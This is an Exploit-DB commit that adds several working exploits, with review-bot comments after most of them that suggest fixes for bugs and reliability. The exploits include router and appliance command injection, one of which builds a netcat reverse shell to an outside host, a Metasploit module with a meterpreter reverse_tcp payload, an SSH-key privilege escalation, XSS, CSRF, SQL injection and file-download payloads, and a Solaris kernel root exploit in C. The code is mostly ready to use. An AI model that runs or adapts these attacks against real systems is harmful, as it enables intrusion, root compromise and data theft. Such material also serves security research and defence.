DB: 2018-08-03

13 changes to exploits/shellcodes

Sun Solaris 11.3 AVS - Local Kernel root Exploit

Allok Fast AVI MPEG Splitter 1.2 - Buffer Overflow (PoC)
AgataSoft Auto PingMaster 1.5 - 'Host name' Denial of Service (PoC)
Imperva SecureSphere 11.5 / 12.0 / 13.0 - Privilege Escalation
SecureSphere 12.0.0.50 - SealMode Shell Escape (Metasploit)

wityCMS 0.6.1 - Cross-Site Scripting

Chartered Accountant : Auditor Website 2.0.1 - Cross-Site Scripting
WityCMS 0.6.2 - Cross-Site Request Forgery (Password Change)
TI Online Examination System v2 - Arbitrary File Download
PageResponse FB Inboxer Add-on 1.2 - 'search_field' SQL Injection
CoSoSys Endpoint Protector 4.5.0.1 - Authenticated Remote Root Command Injection
Universal Media Server 7.1.0 - SSDP Processing XML External Entity Injection
ASUS DSL-N12E_C1 1.1.2.3_345 - Remote Command Execution
Seq 4.2.476 - Authentication Bypass
This commit is contained in:
Offensive Security 2018-08-03 05:01:46 +00:00
parent 903bf974eb
commit 9ea5e15796
14 changed files with 1238 additions and 1 deletions


@ -0,0 +1,22 @@
# Exploit Title: ASUS DSL-N12E_C1 1.1.2.3_345 - Remote Command Execution
# Date: 2018-08-02
# Exploit Author: Fakhri Zulkifli (@d0lph1n98)
# Vendor Homepage: https://www.asus.com/
# Software Link: https://www.asus.com/Networking/DSLN12E_C1/HelpDesk_BIOS/
# Version: 1.1.2.3_345
# Tested on: 1.1.2.3_345
GET /Main_Analysis_Content.asp?current_page=Main_Analysis_Content.asp&next_page=Main_Analysis_Content.asp&next_host=www.target.com&group_id=&modified=0&action_mode=+Refresh+&action_script=&action_wait=&first_time=&applyFlag=1&preferred_lang=EN&firmver=1.1.2.3_345-g987b580&cmdMethod=ping&destIP=%60utelnetd+-p+1337%60&pingCNT=5 HTTP/1.1
Host: www.target.com
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://www.target.com/Main_Analysis_Content.asp
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
# To connect
1. telnet www.target.com 1337
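Review bot: The request carries no `Authorization:` or cookie header, yet `Main_Analysis_Content.asp` belongs to the router's administrative UI, which ASUS firmware normally gates behind HTTP Basic authentication; the PoC should say whether the injection is reachable pre-auth or needs valid credentials, e.g. a header line `# Auth: admin credentials (HTTP Basic) required — unauthenticated path not confirmed` plus the matching `Authorization:` header in the request if so. The injected command is the backtick-quoted `utelnetd -p 1337` in `destIP` (URL-encoded as `%60`), reaching a shell through the `cmdMethod=ping` handler; a one-line comment saying this is command substitution inside the ping invocation would help readers who miss the encoding. Note also that the spawned telnetd accepts connections from anyone who can reach port 1337 until the device reboots, which testers should flag to the device owner.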

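--- a/exploits/linux/local/45130.py
+++ b/exploits/linux/local/45130.py
@@ -0,0 +1,56 @@
+# Title: Imperva SecureSphere <= v13 - Privilege Escalation
+# Author: 0x09AL
+# Date: 01/08/2018
+# Tested on: Imperva SecureSphere 11.5,12.0,13.0
+# Vendor: https://www.imperva.com/
+# Vulnerability Description
+# There is a program named PCE.py which runs as root and starts a unix domain socket listener in /tmp/PCEListener.
+# The problem is that the permissions in this socket are misconfigured. Every user on the system can interact with it.
+# Using this exploit you can add arbritary ssh keys to authorized_keys for the admin user and login as the admin.
+# Steps to reproduce:
+# 1. Be a low-privileged user like oracle,apache. (You can simulate it by using `su oracle`)
+# 2. Create a keypair. ssh-keygen -t rsa -b 4096
+# 3. Modify the ssh_key variable.
+# 4. Run python exploit.py
+# 5. Login as the admin user using ssh -i id_rsa admin@ip-address.
+#
+import socket
+import sys
+import time
+# Create a UDS socket
+sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
+# Connect the socket to the port where the server is listening
+server_address = '/tmp/PCEListener'
+data = ''
+# The ssh rsa-key to be added to the admin user.
+ssh_key = 'ssh-rsa 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 pwn@wpad'
+print >>sys.stderr, 'Connecting to %s' % server_address
+try:
+sock.connect(server_address)
+except socket.error, msg:
+print >>sys.stderr, msg
+sys.exit(1)
+try:
+# Send data
+message = '<commandSet Id="0" mode="Sync" sender="localhost"><commands><command num="0"><argv>platform ssh authorized create</argv><impctlParams/><params><param>--user=admin</param><param>--key=%s</param></params></command></commands></commandSet>' % ssh_key
+message_size = "0" * (10 - len(str(len(message)))) + str(len(message))
+print >>sys.stderr, 'Sending message size "%s"' % message_size
+sock.sendall("%s" % message_size)
+print >> sys.stderr, 'Sending exploit'
+sock.sendall(message)
+amount_received = 0
+amount_expected = int(sock.recv(10))
+while amount_received < amount_expected:
+data += sock.recv(10)
+amount_received = len(data)
+time.sleep(0.5)
+# print >>sys.stderr, 'received "%s"' % data
+print >>sys.stderr, 'Response : \n %s' % data
+finally:
+print >>sys.stderr, 'closing socket'
+sock.close()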
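Review bot: The receive loop never terminates if the listener closes the connection before `amount_expected` bytes arrive: `sock.recv(10)` then returns an empty string, `data` stops growing, and `while amount_received < amount_expected` stays true forever with a 0.5 s sleep per pass. Check for EOF inside the loop — `chunk = sock.recv(10)` / `if not chunk: break` / `data += chunk` — and drop the `time.sleep(0.5)`, since a blocking recv already waits for data. The framing also assumes the first 10 bytes of the reply are a decimal length, so `int(sock.recv(10))` will raise ValueError on a short read or a non-numeric error response; wrapping it and printing the raw bytes would make failures against other SecureSphere builds diagnosable. The file is Python 2 only (`print >>sys.stderr`, `except socket.error, msg`), which a `#!/usr/bin/env python2` shebang would make explicit.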

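--- a/exploits/linux/local/45132.rb
+++ b/exploits/linux/local/45132.rb
@@ -0,0 +1,139 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+class MetasploitModule < Msf::Exploit::Remote
+Rank = ExcellentRanking
+include Msf::Exploit::Remote::SSH
+def initialize(info={})
+super(update_info(info,
+'Name' => "SecureSphere v12.0.0.50 - SealMode Shell Escape (root)",
+'Description' => %q{
+This module exploits a vulnerability in SecureSphere cli to escape
+the sealed-mode of Imperva and execute code as the root user. This
+module requires credentials of a user to login to the SSH or can be
+exploited by a less privileged user.
+},
+'License' => MSF_LICENSE,
+'Author' =>
+[
+'0x09AL', # Vulnerability Discovery and Metasploit Module
+],
+'References' =>
+[
+['URL', 'N/A']
+],
+'DefaultOptions' =>
+{
+'Payload' => 'python/meterpreter/reverse_tcp',
+},
+'Platform' => ['python'],
+'Arch' => ARCH_PYTHON,
+'Targets' => [ ['Automatic', {}] ],
+'Privileged' => false,
+'DisclosureDate' => "01/08/2018",
+'DefaultTarget' => 0
+))
+register_options(
+[
+Opt::RHOST(),
+Opt::RPORT(22),
+OptString.new('USERNAME', [ true, 'The username for authentication', 'root' ]),
+OptString.new('Password', [ true, 'The password for authentication', '123456' ]),
+]
+)
+register_advanced_options(
+[
+OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
+OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
+]
+)
+end
+def rhost
+datastore['RHOST']
+end
+def rport
+datastore['RPORT']
+end
+def username
+datastore['USERNAME']
+end
+def password
+datastore['PASSWORD']
+end
+def exploit
+factory = ssh_socket_factory
+ssh_options = {
+:auth_methods => ['password', 'keyboard-interactive'],
+:port => rport,
+:use_agent => false,
+:config => false,
+:password => password,
+:proxy => factory,
+:non_interactive => true
+}
+ssh_options.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
+print_status("#{rhost}:#{rport} - Attempting to login...")
+begin
+ssh = nil
+::Timeout.timeout(datastore['SSH_TIMEOUT']) do
+ssh = Net::SSH.start(rhost, username, ssh_options)
+end
+rescue Rex::ConnectionError
+return
+rescue Net::SSH::Disconnect, ::EOFError
+print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
+return
+rescue ::Timeout::Error
+print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
+return
+rescue Net::SSH::AuthenticationFailed
+print_error "#{rhost}:#{rport} SSH - Failed authentication due wrong credentials."
+rescue Net::SSH::Exception => e
+print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
+return
+end
+if ssh
+print_good("SSH connection established successfully.")
+ssh.open_channel do |channel|
+channel.exec "impctl platform import --password \" & uname -a & sh\"" do |ch, success|
+if success
+channel.on_data do |ch, data|
+if data.inspect.match(/Linux/)
+print_good "Host is vulnerable"
+channel.send_data "python -c \"#{payload.encoded}\"\n"
+channel.close
+else
+print_bad "Host is not vulnerable"
+channel.close
+end
+end
+end
+end
+end
+begin
+ssh.loop unless session_created?
+rescue Errno::EBADF => e
+elog(e.message)
+end
+end
+end
+end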
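Review bot: `'Privileged' => false` contradicts the module's own name and description, which say the sealed-mode escape runs code as root; the framework uses this flag to label the resulting session, so it should read `'Privileged' => true`. The password option is registered as `OptString.new('Password', ...)` while the `password` helper reads `datastore['PASSWORD']` — the datastore is case-insensitive in current framework releases, but module convention (and msftidy) expects the upper-case `OptString.new('PASSWORD', ...)` form so the mismatch does not bite on older installs. `['URL', 'N/A']` is not a usable reference; cite the advisory or drop the entry. Two smaller items: the `rescue Net::SSH::AuthenticationFailed` branch prints but does not `return`, relying on the later `if ssh` guard to skip exploitation, and the baked-in default `'123456'` password should probably be an empty required option rather than a guess.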


@ -0,0 +1,26 @@
*******************************************************************************************
# Exploit Title: Chartered Accountant : Auditor Website 2.0.1 - Reflected , Stored XSS
# Date: 26.06.2018
# Site Titel : Find your needs on Domain Name
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/cms-auditor-website/
# Category: Web Application
# Version: 2.0.1
# Exploit Author: Vikas Chaudhary
# Contact: https://www.facebook.com/profile.php?id=100011287630308
# Web: https://gkaim.com/
# Tested on: Windows 10 -Firefox
# CVE: CVE-2018-13256
*****************************************************************************************
Proof of Concept:-
--------------------------
1. Go to the site ( http://server/auditor/ ) .
2- Select REGISTER page (Register now) .
3- Create an account using your Email address => in FIRST NAME , LAST NAME ,and PASSWORD put this script <img src =x onError=alert("VIKAS")>
4- Now Check your Email and verify it .
5- Again come to site and login it using your verified Email and Password .
6- You will having popup VIKAS in you account when you loged in .
***************************************************************************************
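Review bot: The header claims "Reflected , Stored XSS" but the steps only demonstrate the stored variant (the payload persists in the profile fields and fires on the next login); either add the reflected request and parameter or narrow the title to `Stored Cross-Site Scripting`, as the commit's own listing effectively does. The payload `<img src =x onError=alert("VIKAS")>` is entered into FIRST NAME, LAST NAME and PASSWORD at once, but the advisory never says which of those fields is rendered unescaped — naming the vulnerable field(s) would let a defender target the fix and a tester reproduce it without the shotgun approach.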


@ -0,0 +1,48 @@
<!--
# Exploit Title: WityCMS 0.6.2 - Cross-Site Request Forgery (Password Change)
# Vendor Homepage: https://creatiwity.net/witycms
# Software Link: https://github.com/Creatiwity/wityCMS/releases/tag/0.6.2
# Exploit Author: Porhai Eung
# Website: http://www.chhaipov.com
# CVE: CVE-2018-14029
# Category: webapps
1. Description
CSRF vulnerability in admin/user/edit in Creatiwity wityCMS 0.6.2 allows an attacker to take over a user account by modifying user's data such as email and password
2. Exploit and Proof of Concept
To exploit this vulnerability, victim need to be logged in at target site namely victim.com and visit crafted site made by attacker namely attacker.com. Then an authenticated POST request will be generated from victim browser and it will be submit to victim.com to modify user's data to attacker desired value.
- POC hosted at attacker.com
-->
</div>
<iframe id="test" name="test" style="display:none">
</iframe>
<form action="http://victim.com/wity/admin/user/edit/1" method="post" id="the_form" style="display:none" target="test">
<input type="hidden" name="id" value="1" />
<input type="hidden" name="nickname" value="admin" />
<input type="hidden" name="password" value="csrf123" />
<input type="hidden" name="password_conf" value="csrf123" />
<input type="hidden" name="email" value="csrf@test.com" />
<input type="hidden" name="groupe" value="0" />
<input type="hidden" name="type" value="all" />
<input type="submit" value="Change Password" />
</form>
<script type="text/javascript">
//<![CDATA[
var $form = document.getElementById ('the_form');
$form.submit ();
//]]>
</script>
</div>
<!--
3. Solution
- Original password is needed in order to change new password of user
- Implement CSRF token
-->
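Review bot: The PoC fragment opens with a stray `</div>` before the iframe and closes with another after the script, neither of which has a matching opening tag; drop both or wrap the form in a `<div>` so the attacker page is well-formed markup. The form hard-codes `id=1` and `action="http://victim.com/wity/admin/user/edit/1"`, so the victim must be an administrator entitled to edit user 1 — the description should say the target is the admin account rather than "a user account". Browsers that default cookies to `SameSite=Lax` will not attach the session cookie to this cross-site POST, which is worth recording as a partial mitigation next to the proposed CSRF token and current-password requirement.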


@ -0,0 +1,30 @@
# Exploit Title: TI Online Examination System v2 - Arbitrary File Download
# Dork: N/A
# Date: 02.08.2018
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/ti-online-examination-system-v2/11248904
# Version: 2.0
# Category: Webapps
# Tested on: Kali linux
# Description : The "Export" operation in the admin panel is vulnerable.
The attacker can download and read all files known by the name via
"download.php"
====================================================
# Demo : server/admin/
# Vuln file : /admin/download.php
115. $data_action = $_REQUEST['action'];
116. if($data_action == 'downloadfile')
117. {
118. $file = $_REQUEST['file'];
119. $name = $file;
120. $result = output_file($file, $name);
# PoC :
http://server/admin/download.php?action=downloadfile&file=[filename]
you can write the known file name instead of [filename]. For Example:
'download.php' or 'index.php'
====================================================
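Review bot: The quoted code hands `$_REQUEST['file']` straight to `output_file($file, $name)` with no basename() or directory check, so unless output_file() normalises the path this is an arbitrary file read with traversal, not merely download of files "known by the name" — e.g. `file=../../config.php` or `file=/etc/passwd` — and the advisory should test and state that. It should also say explicitly that the endpoint sits under `/admin/` and therefore needs an authenticated admin session (or confirm that it does not), because that changes the severity materially. Retrieving `download.php` itself returns PHP source rather than executing it, which is worth noting since configuration files fetched the same way will expose database credentials.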


@ -0,0 +1,55 @@
# Exploit Title: FB Inboxer 1.2 - 'search_field' SQL Injection
# Google Dork: N/A
# Date: 02.08.2018
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/pageresponse-a-fb-inboxer-addon-facebook-auto-commentprivate-reply-likeshare-for-full-page/21486371
# Version: 1.2
# Tested on: Kali linux
====================================================
Description : The vulnerability allows an attacker to inject sql commands
from the search section with 'search_field' parameter in the management
panel.
# Demo : http://server/home/login
# PoC : SQLi :
http://server/admin/user_management/ajax_list_info
POST /admin/user_management/ajax_list_info HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://server/admin/user_management
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 91
Cookie: ci_session=8v3965595vs5h1gcufa8kmkl8uti8ccr;
crud_page_c2dc7c9e0776f8cb12c51196de4108be=2;
per_page_c2dc7c9e0776f8cb12c51196de4108be=15;
hidden_ordering_c2dc7c9e0776f8cb12c51196de4108be=asc;
hidden_sorting_c2dc7c9e0776f8cb12c51196de4108be=id;
search_text_c2dc7c9e0776f8cb12c51196de4108be=tes;
search_field_c2dc7c9e0776f8cb12c51196de4108be=name
Connection: keep-alive
search_text=tes&search_field=name&per_page=15&order_by%5B0%5D=id&order_by%5B1%5D=asc&page=1
Parameter: search_field (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)
Payload: search_text=tes&search_field=name AND (SELECT 4580 FROM(SELECT
COUNT(*),CONCAT(0x71716a7671,(SELECT
(ELT(4580=4580,1))),0x7170717671,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY
x)a)&per_page=15&order_by[0]=id&order_by[1]=asc&page=1
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: search_text=tes&search_field=name AND
SLEEP(5)&per_page=15&order_by[0]=id&order_by[1]=asc&page=1
====================================================
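Review bot: The payload is appended to `search_field=name` without a closing quote, which suggests the value is spliced into the query as the column to search on, i.e. the injection is in an identifier position rather than a quoted value; if so, the fix is a whitelist of permitted column names, not (only) bound parameters, and the advisory should say so. The captured request includes `Cookie: ci_session=...`, so exploitation requires an authenticated management-panel session — state that explicitly alongside "management panel". `order_by[0]` and `order_by[1]` are very likely interpolated the same way and deserve the same test before the fix is declared complete.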

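--- a/exploits/php/webapps/45131.py
+++ b/exploits/php/webapps/45131.py
@@ -0,0 +1,57 @@
+# Title : CoSoSys Endpoint Protector - Authenticated Remote Root Command Injection
+# Date : Vulnerability submitted in 01/12/2017 and published in 01/08/2018
+# Author : 0x09AL
+# Tested on : Endpoint Protector 4.5.0.1
+# Software Link : https://www.endpointprotector.com/
+# Vulnerable Versions : Endpoint Protector <= 4.5.0.1
+# Endpoint Protector suffers from an authenticated command injection vulnerability. By default the username and password are : root:epp2011
+# In the Appliance Tab , Server Maintenance the NTP Server field is vulnerable to command injection. There is a call to sh -c {NTP Server field} which is not validated. Attached is the exploit which does this automatically.
+# The command may take a while to execute.
+import requests
+exp = requests.session()
+user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0'
+username = 'root'
+password = 'epp2011'
+host = 'x.x.x.x.x'
+rev_host = 'x.x.x.x'
+rev_port = '443'
+r = exp.post('https://%s/index.php/login' % host,data={'username':username,'password':password,'login':'Login'},verify=False)
+shell = 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc %s %s >/tmp/f' % (rev_host,rev_port)
+payload = '&& %s' % shell
+print payload
+if(r.text.find("Welcome Guest")>0):
+print "[-] Incorrect credentials [-]"
+else:
+print "[+] Logged in successfully [+]"
+r = exp.get('https://%s/index.php/appliance/maintenance' % host,headers={'X-Requested-With': 'XMLHttpRequest'},verify=False)
+if(r.text.find("csrf")>-1):
+print "[+] Getting CSRF Token [+]"
+csrf_token = r.text.split('value="')[1].split('">')[0]
+print "[+] Token: %s [+]" % csrf_token
+post_data = {
+'csrf_token' : csrf_token,
+'continent' :'Europe',
+'region' :'Berlin',
+'timeSetting[ntpserver]' : payload,
+'timeSetting[timesync]' :'12'
+}
+r = exp.post('https://%s/index.php/appliance/timezone' % host,data=post_data,headers={'X-Requested-With': 'XMLHttpRequest','Referer': 'https://%s/index.php/' % host},verify=False)
+print "[+] Sending exploit [+]"
+if(r.text.find("nc")>-1):
+post_data = {
+'ntpserver': payload,
+'continent' :'Europe',
+'region' :'Berlin'
+}
+r = exp.post('https://%s/index.php/appliance/timezone' % host,data=post_data,headers={'X-Requested-With': 'XMLHttpRequest','Referer': 'https://%s/index.php/' % host},verify=False)
+print "[+] Exploit success [+]"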
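Review bot: The CSRF token is scraped with `r.text.split('value="')[1].split('">')[0]`, which takes the first `value="` attribute anywhere on the page, not necessarily the csrf_token input, and raises IndexError when the marker is absent even though the preceding `"csrf"` check passed; anchor the extraction on the field itself, e.g. `m = re.search(r'name="csrf_token"[^>]*value="([^"]*)"', r.text)` with `import re` (attribute order to be confirmed against the real page). `host = 'x.x.x.x.x'` has five octets and can never be a valid placeholder — it should match `rev_host`'s `x.x.x.x`. `verify=False` is expected against a self-signed appliance but deserves a comment saying so, and the reverse-shell POST is sent twice with different field names (`timeSetting[ntpserver]`, then `ntpserver`) without explaining when the second form is needed.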


@ -0,0 +1,514 @@
/*
# Exploit Title: Solaris/OpenSolaris AVS kernel code execution
# Google Dork: [if applicable]
# Date: 24/7/2018
# Exploit Author: mu-b
# Vendor Homepage: oracle.com
# Software Link:
# Version: Solaris 10, Solaris <= 11.3
# Tested on: Solaris 11.X, OpenSolaris
# CVE : CVE-2018-2892
http://digit-labs.org/files/exploits/sdbc-testinit.c
http://digit-labs.org/files/exploits/sdbc-testinit-v2.c
a few more added to digit-labs as well, old irix-espd remote root for
irix as well.
/* sdbc-testinit.c
*
* Copyright (c) 2008 by <mu-b@digit-labs.org>
*
* Sun Opensolaris <= snv_104 local kernel root exploit
* by mu-b - Sun 21 Dec 2008
*
* $Id: sdbc-testinit.c 37 2018-07-23 20:08:39Z mu-b $
*
* - Tested on: Opensolaris snv_104 (i86pc)
*
* hmmm, this has gotta be test code!?%$!
*
* - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2008!@$!
*/
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <libelf.h>
#include <string.h>
#include <stropts.h>
#include <sys/elf.h>
#include <sys/mman.h>
#include <sys/param.h>
#include <sys/syscall.h>
#include <unistd.h>
#define SDBC(a) (('B'<<16)|('C'<<8)|(a))
#define SDBC_TEST_INIT SDBC(5)
typedef struct _sdbc_ioctl32_s {
unsigned int arg0;
unsigned int arg1;
unsigned int arg2;
unsigned int arg3;
unsigned int arg4;
unsigned int magic;
unsigned int ustatus;
unsigned int pad[1];
} _sdbc_ioctl32_t;
typedef struct _sysent_s {
char sy_narg;
#ifdef _LP64
unsigned short sy_flags;
#else
unsigned char sy_flags;
#endif
int (*sy_call)();
void *sy_lock;
void *sy_callc;
} _sysent_t;
#ifdef _LP64
#define KTHREAD 0x16
#else
#define KTHREAD 0x10
#endif
#define XSTRINGY(a) STRINGY(a)
#define STRINGY(a) #a
int
pown_kernel (void)
{
__asm__ ( "mov %gs:" XSTRINGY(KTHREAD) ", %eax\n"
"mov 0xdc(%eax), %eax\n"
"mov 0x14(%eax), %eax\n"
"movl $0x0, 0x4(%eax)\n"
"movl $0x0, 0xc(%eax)");
return (0);
}
static void *
resolve_kernsymbl (char *name)
{
Elf_Scn *scn = NULL;
Elf *elf;
void *r = NULL;
int fd;
fd = open ("/dev/ksyms", O_RDONLY);
if (fd < 0)
{
fprintf (stderr, "failed opening /dev/ksyms\n");
return (NULL);
}
elf_version (EV_CURRENT);
if ((elf = elf_begin (fd, ELF_C_READ, NULL)) == NULL)
{
fprintf (stderr, "elf_begin failed\n");
goto done;
}
while ((scn = elf_nextscn (elf, scn)) != 0)
{
Elf32_Shdr *shdr;
if ((shdr = elf32_getshdr (scn)) != 0)
{
if (shdr->sh_type == SHT_SYMTAB)
{
Elf_Data *data = NULL;
if ((data = elf_getdata (scn, data)) == 0 || data->d_size == 0)
continue;
Elf32_Sym *esym = (Elf32_Sym *) data->d_buf;
Elf32_Sym *lastsym = (Elf32_Sym *) ((char *) data->d_buf + data->d_size);
for (; esym < lastsym; esym++)
{
if (esym->st_value == 0 ||
(ELF32_ST_TYPE(esym->st_info) == STT_FUNC))
continue;
if (strcmp (name, elf_strptr (elf, shdr->sh_link, (size_t) esym->st_name)) == 0)
{
r = (void *) esym->st_value;
goto done;
}
}
}
}
}
done:
elf_end (elf);
close (fd);
return (r);
}
int
main (int argc, char **argv)
{
void *devarrayp, *sysentp, *ptr, *target;
_sdbc_ioctl32_t sdcp_ioctl;
_sysent_t sysent;
int devindx, fd, id, n, sysindx;
printf ("Sun Opensolaris <= snv_104 local kernel root exploit\n"
"by: <mu-b@digit-labs.org>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
fd = open ("/dev/sdbc", O_RDONLY);
if (fd < 0)
{
fprintf (stderr, "%s: failed opening /dev/sdbc\n", argv[0]);
return (EXIT_FAILURE);
}
memset (&sysent, 0, sizeof (sysent));
sysent.sy_narg = 0;
sysent.sy_flags = 0;
sysent.sy_call = pown_kernel;
sysent.sy_lock = NULL;
sysent.sy_callc = NULL;
devarrayp = resolve_kernsymbl ("devarray");
if (devarrayp == NULL)
{
fprintf (stderr, "%s: failed resolving &devarray\n", argv[0]);
return (EXIT_FAILURE);
}
sysentp = resolve_kernsymbl ("sysent");
if (sysentp == NULL)
{
fprintf (stderr, "%s: failed resolving &sysent\n", argv[0]);
return (EXIT_FAILURE);
}
sysentp += 8; /* any ideas? */
target = sysentp + 0x2C0;
sysindx = ((int) target - (int) sysentp) / sizeof (sysent);
devindx = ((char *) target - (char *) devarrayp) / 256;
ptr = mmap (NULL, PAGESIZE, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0);
if ((int) ptr == -1)
{
fprintf (stderr, "failed mmap\n");
return (EXIT_FAILURE);
}
memset (ptr, 0, PAGESIZE);
memcpy ((ptr + PAGESIZE) - sizeof (sysent), &sysent, sizeof (sysent));
memset (&sdcp_ioctl, 0, sizeof (sdcp_ioctl));
sdcp_ioctl.arg0 = (unsigned int) (ptr + PAGESIZE) - sizeof (sysent);
sdcp_ioctl.arg1 = devindx;
sdcp_ioctl.arg2 = sizeof (sysent) * 2;
printf ("* devarray: 0x%08X, sysent: 0x%08X, target: 0x%08X\n", (int) devarrayp, (int) sysentp, (int) target);
printf ("* devarray idx: %u\n", sdcp_ioctl.arg1);
printf ("* sysent idx: %u\n", sysindx);
printf ("\n* overwriting... ");
n = ioctl (fd, SDBC_TEST_INIT, &sdcp_ioctl);
printf ("done\n");
printf ("\n* jumping... ");
syscall (sysindx);
printf ("done\n\n");
id = getuid ();
printf ("* getuid(): %d\n", id);
if (id == 0)
{
printf ("+Wh00t\n\n");
/* exec shell, for some reason execve doesn't work!?$! */
system ("/bin/bash");
}
else
fprintf (stderr, "%s: failed to obtain root :(\n", argv[0]);
return (EXIT_SUCCESS);
}
*/
/* sdbc-testinit-v2.c
*
* Copyright (c) 2008-2017 by <mu-b@digit-labs.org>
*
* Sun Solaris <= 11.3 AVS local kernel root exploit
* by mu-b - Tue 16 May 2017
*
* $Id: sdbc-testinit-v2.c 37 2018-07-23 20:08:39Z mu-b $
*
* - Tested on: Solaris 5.11 11.3 + AVS (i86pc)
* Opensolaris snv_104 + AVS (i86pc)
*
* hmmm, this has gotta be test code!?%$!
*
* This was originally found in OpenSolaris and later ported to Solaris with the
* exception that we now have to exploit a signedness bug in the devarray index
* parameter whereas previously it was unbounded! (see sdbc-testinit.c).
*
* - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2008-2017!@$!
*/
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <libelf.h>
#include <limits.h>
#include <string.h>
#include <stropts.h>
#include <sys/elf.h>
#include <sys/mman.h>
#include <sys/param.h>
#include <sys/syscall.h>
#include <unistd.h>
#define SDBC(a) (('B'<<16)|('C'<<8)|(a))
#define SDBC_TEST_INIT SDBC(5)
typedef struct _sdbc_ioctl {
long arg0;
long arg1;
long arg2;
long arg3;
long arg4;
long magic;
long ustatus;
long pad[1];
} _sdbc_ioctl_t;
typedef struct _sysent_s {
char sy_narg;
#ifdef _LP64
unsigned short sy_flags;
#else
unsigned char sy_flags;
#endif
int (*sy_call)();
void *sy_lock;
void *sy_callc;
} _sysent_t;
#ifdef _LP64
# define KTHREAD 0x18
#else
# define KTHREAD 0x10
#endif
#define XSTRINGY(a) STRINGY(a)
#define STRINGY(a) #a
int
pown_kernel (void)
{
#ifdef _LP64
__asm__ ( "mov %gs:" XSTRINGY(KTHREAD) ", %rax\n"
"mov 0x1c8(%rax), %rax\n"
"movl $0x0, 0x4(%rax)\n" /* kthread_t->t_cred->cr_uid */
"movl $0x0, 0x8(%rax)\n" /* kthread_t->t_cred->cr_gid */
"movl $0x0, 0xc(%rax)\n" /* kthread_t->t_cred->cr_ruid */
"movl $0x0, 0x10(%rax)"); /* kthread_t->t_cred->cr_rgid */
#else
__asm__ ( "mov %gs:" XSTRINGY(KTHREAD) ", %eax\n"
"mov 0xdc(%eax), %eax\n"
"mov 0x14(%eax), %eax\n"
"movl $0x0, 0x4(%eax)\n"
"movl $0x0, 0x8(%eax)\n"
"movl $0x0, 0xc(%eax)\n"
"movl $0x0, 0x10(%eax)");
#endif
return (0);
}
static void *
resolve_kernsymbl (char *name)
{
Elf_Scn *scn = NULL;
Elf *elf;
void *r = NULL;
int fd;
fd = open ("/dev/ksyms", O_RDONLY);
if (fd < 0)
{
fprintf (stderr, "failed opening /dev/ksyms\n");
return (NULL);
}
elf_version (EV_CURRENT);
if ((elf = elf_begin (fd, ELF_C_READ, NULL)) == NULL)
{
fprintf (stderr, "elf_begin failed\n");
goto done;
}
while ((scn = elf_nextscn (elf, scn)) != 0)
{
#ifdef _LP64
Elf64_Shdr *shdr;
if ((shdr = elf64_getshdr (scn)) != 0)
#else
Elf32_Shdr *shdr;
if ((shdr = elf32_getshdr (scn)) != 0)
#endif
{
if (shdr->sh_type == SHT_SYMTAB)
{
Elf_Data *data = NULL;
if ((data = elf_getdata (scn, data)) == 0 || data->d_size == 0)
continue;
#ifdef _LP64
Elf64_Sym *esym = (Elf64_Sym *) data->d_buf;
Elf64_Sym *lastsym = (Elf64_Sym *) ((char *) data->d_buf + data->d_size);
#else
Elf32_Sym *esym = (Elf32_Sym *) data->d_buf;
Elf32_Sym *lastsym = (Elf32_Sym *) ((char *) data->d_buf + data->d_size);
#endif
for (; esym < lastsym; esym++)
{
if (esym->st_value == 0 ||
#ifdef _LP64
(ELF64_ST_TYPE(esym->st_info) == STT_FUNC))
#else
(ELF32_ST_TYPE(esym->st_info) == STT_FUNC))
#endif
continue;
if (strcmp (name, elf_strptr (elf, shdr->sh_link, (size_t) esym->st_name)) == 0)
{
r = (void *) esym->st_value;
goto done;
}
}
}
}
}
done:
elf_end (elf);
close (fd);
return (r);
}
int
main (int argc, char **argv)
{
void *devarrayp, *sysentp, *ptr, *targetp;
int align, fd, id, n, sysindx;
_sdbc_ioctl_t sdbc_ioctl;
_sysent_t sysent;
long devindx;
printf ("Sun (Open)Solaris <= 11.3 AVS local kernel root exploit\n"
